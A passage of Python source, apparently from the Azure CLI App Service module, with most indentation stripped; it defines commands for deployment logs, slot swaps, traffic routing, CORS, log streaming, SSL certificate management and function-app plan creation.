return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
    url = site.enabled_host_names[0]  # picks the custom domain URL in case a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob support
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging:
fs_log = None
blob_log = None
level = application_logging != 'off'
if application_logging in ['filesystem', 'off']:
fs_log = FileSystemApplicationLogsConfig(level=level)
level = application_logging != 'off'
if application_logging in ['azureblobstorage', 'off']:
blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
sas_url=None)
application_logs = ApplicationLogsConfig(file_system=fs_log,
azure_blob_storage=blob_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
        # TODO: the az blob storage log config is currently not in use; it will be implemented later.
        # Tracked as issue #4764 on GitHub
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
            # 100 MB max log size, retention lasts 3 days. Yes, we hard-code it; the portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
import urllib3
import requests
scm_url = _get_scm_url(cmd, resource_group, name, slot)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
deployment_log_url = ''
if deployment_id:
deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
else:
deployments_url = '{}/api/deployments/'.format(scm_url)
response = requests.get(deployments_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployments_url, response.status_code, response.reason))
sorted_logs = sorted(
response.json(),
key=lambda x: x['start_time'],
reverse=True
)
if sorted_logs and sorted_logs[0]:
deployment_log_url = sorted_logs[0].get('log_url', '')
if deployment_log_url:
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployment_log_url, response.status_code, response.reason))
return response.json()
return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group, name, slot)
deployment_log_url = '{}/api/deployments/'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
import urllib3
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
import requests
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
scm_url, response.status_code, response.reason))
return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, preserve_vnet=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
    # Default isPreserveVnet to 'true' if preserve_vnet is None
    isPreserveVnet = preserve_vnet if preserve_vnet is not None else 'true'
    # conversion from string to Boolean
isPreserveVnet = bool(isPreserveVnet == 'true')
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), isPreserveVnet)
return poller
if action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, isPreserveVnet)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, isPreserveVnet)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
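# Illustrative sketch (hypothetical helper, for documentation only): each
# --distribution entry handled by set_traffic_routing has the form
# <slot>=<percentage>; e.g. 'staging=25' routes 25% of traffic to the slot host
# name. The app name and host name suffix below are made up.
def _example_traffic_distribution_entry():
    slot, percentage = 'staging=25'.split('=')
    action_host_name = 'contoso' + '-' + slot + '.azurewebsites.net'
    return action_host_name, float(percentage)  # ('contoso-staging.azurewebsites.net', 25.0)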
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
user, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
t = threading.Thread(target=_get_log, args=(streaming_url, user, password))
t.daemon = True
t.start()
while True:
time.sleep(100) # so that ctrl+c can stop the command
def download_historical_logs(cmd, resource_group_name, name, log_file=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
url = scm_url.rstrip('/') + '/dump'
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
_get_log(url, user_name, password, log_file)
logger.warning('Downloaded logs to %s', log_file)
def _get_site_credential(cli_ctx, resource_group_name, name, slot=None):
creds = _generic_site_operation(cli_ctx, resource_group_name, name, 'list_publishing_credentials', slot)
creds = creds.result()
return (creds.publishing_user_name, creds.publishing_password)
def _get_log(url, user_name, password, log_file=None):
import certifi
import urllib3
try:
import urllib3.contrib.pyopenssl
urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = urllib3.PoolManager(cert_reqs='CERT_REQUIRED', ca_certs=certifi.where())
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
                # Extra encode() and decode() for stdout encodings that do not support 'utf-8'
print(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace'), end='') # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    with open(certificate_file, 'rb') as cert_file:
        cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
    ''' Decrypts the .pfx file and returns the certificate thumbprint '''
    with open(certificate_file, 'rb') as f:
        p12 = OpenSSL.crypto.load_pkcs12(f.read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def show_ssl_cert(cmd, resource_group_name, certificate_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.get(resource_group_name, certificate_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = None
if not is_valid_resource_id(key_vault):
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
key_vaults = kv_client.vaults.list_by_subscription()
for kv in key_vaults:
if key_vault == kv.name:
kv_id = kv.id
break
else:
kv_id = key_vault
if kv_id is None:
kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
'\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
'--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
logger.warning(kv_msg)
return
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
    # If in the public cloud, check if the certificate is an App Service Certificate,
    # in the same or a different subscription
kv_secret_name = None
cloud_type = cmd.cli_ctx.cloud.name
if cloud_type.lower() == PUBLIC_CLOUD.lower():
if kv_subscription.lower() != client.config.subscription_id.lower():
diff_subscription_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_APPSERVICE,
subscription_id=kv_subscription)
ascs = diff_subscription_client.app_service_certificate_orders.list()
else:
ascs = client.app_service_certificate_orders.list()
kv_secret_name = None
for asc in ascs:
if asc.name == key_vault_certificate_name:
kv_secret_name = asc.certificates[key_vault_certificate_name].key_vault_secret_name
# if kv_secret_name is not populated, it is not an appservice certificate, proceed for KV certificates
if not kv_secret_name:
kv_secret_name = key_vault_certificate_name
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=kv_secret_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
    if plan_info.sku.tier.upper() in ('FREE', 'SHARED'):
        raise CLIError('Managed Certificate is not supported on Free and Shared tiers.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
# TODO: Update manual polling to use LongRunningOperation once backend API & new SDK supports polling
try:
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
except DefaultErrorResponseException as ex:
poll_url = ex.response.headers['Location'] if 'Location' in ex.response.headers else None
if ex.response.status_code == 202 and poll_url:
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
poll_timeout = time.time() + 60 * 2 # 2 minute timeout
while r.status_code != 200 and time.time() < poll_timeout:
time.sleep(5)
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
if r.status_code == 200:
try:
return r.json()
except ValueError:
return r.text
logger.warning("Managed Certificate creation in progress. Please use the command "
"'az webapp config ssl show -g %s --certificate-name %s' "
" to view your certificate once it is created", resource_group_name, hostname)
return
raise CLIError(ex)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
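# Patches only the targeted hostname binding by sending a Site object whose host_name_ssl_states
# entry has to_update=True; other bindings on the app are left untouched.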
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'create_or_update',
slot, updated_webapp)
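# Looks up the certificate by thumbprint, first in the plan's resource group and then in the app's.
# A certificate covering a single, non-wildcard hostname is bound directly; otherwise every app
# hostname matching the certificate's host names gets its SSL state updated.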
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
found_cert = None
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if not found_cert:
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if found_cert:
        if len(found_cert.host_names) == 1 and not found_cert.host_names[0].startswith('*'):
            return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
                                               found_cert.host_names[0], ssl_type,
                                               certificate_thumbprint, slot)
        query_result = list_hostnames(cmd, resource_group_name, name, slot)
        hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
        to_update = _match_host_names_from_cert(found_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise ResourceNotFoundError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
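# Illustrative example (not from the source): a certificate issued for '*.contoso.com' would match
# app hostnames 'www.contoso.com' and 'api.contoso.com', since only the portion after the first '.'
# is compared for wildcard entries; non-wildcard names must match verbatim.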
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
# helper class that handles runtime stacks in formats like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
@staticmethod
def remove_delimiters(runtime):
import re
# delimiters allowed: '|', ':'
if '|' in runtime:
runtime = re.split('[|]', runtime)
elif ':' in runtime:
runtime = re.split('[:]', runtime)
else:
runtime = [runtime]
return '|'.join(filter(None, runtime))
def resolve(self, display_name):
self._load_stacks_hardcoded()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks_hardcoded()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
for k, v in stack['configs'].items():
already_in_appsettings = False
for app_setting in site_config.app_settings:
if app_setting.name == k:
already_in_appsettings = True
app_setting.value = v
if not already_in_appsettings:
site_config.app_settings.append(NameValuePair(name=k, value=v))
return site_config
def _load_stacks_hardcoded(self):
if self._stacks:
return
result = []
if self._linux:
result = get_file_json(RUNTIME_STACKS)['linux']
for r in result:
r['setter'] = _StackRuntimeHelper.update_site_config
else: # Windows stacks
result = get_file_json(RUNTIME_STACKS)['windows']
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
            # get all stack versions except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
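# Creates an App Service plan for function apps: normalizes the SKU, allows --max-burst only for
# Elastic Premium plans, validates --max-burst and worker counts against the 0-20 range, and
# defaults the location to the resource group's location when none is given.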
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku,
number_of_workers=None, max_burst=None, location=None, tags=None):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_name(sku)
if max_burst is not None:
if tier.lower() != "elasticpremium":
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-elastic-worker-count',
number_of_workers, min_val=0, max_val=20)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def validate_and_convert_to_int(flag, val):
try:
return int(val)
except ValueError:
raise CLIError("Usage error: {} is expected to have an int value.".format(flag))
def validate_range_of_int_flag(flag_name, value, min_val, max_val):
value = validate_and_convert_to_int(flag_name, value)
if min_val > value or value > max_val:
raise CLIError("Usage error: {} is expected to be between {} and {} (inclusive)".format(flag_name, min_val,
max_val))
return value
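# Creates a function app end to end: validates the --plan/--consumption-plan-location choice,
# resolves the runtime stack and version from the bundled stacks JSON, assembles site config and
# app settings (storage connection, FUNCTIONS_EXTENSION_VERSION, content share and App Insights
# settings where applicable), creates the site, and then optionally wires up source control,
# a container image, and a managed identity.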
def create_function(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None, assign_identities=None,
role='Contributor', scope=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 2. In the future, specifying a version will "
"be required. To create a 2.x function you would pass in the flag `--functions-version 2`")
functions_version = '2'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
SiteConfig, Site, NameValuePair = cmd.get_models('SiteConfig', 'Site', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
disable_app_insights = (disable_app_insights == "true")
site_config = SiteConfig(app_settings=[])
functionapp_def = Site(location=None, site_config=site_config, tags=tags)
KEYS = FUNCTIONS_STACKS_API_KEYS()
client = web_client_factory(cmd.cli_ctx)
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
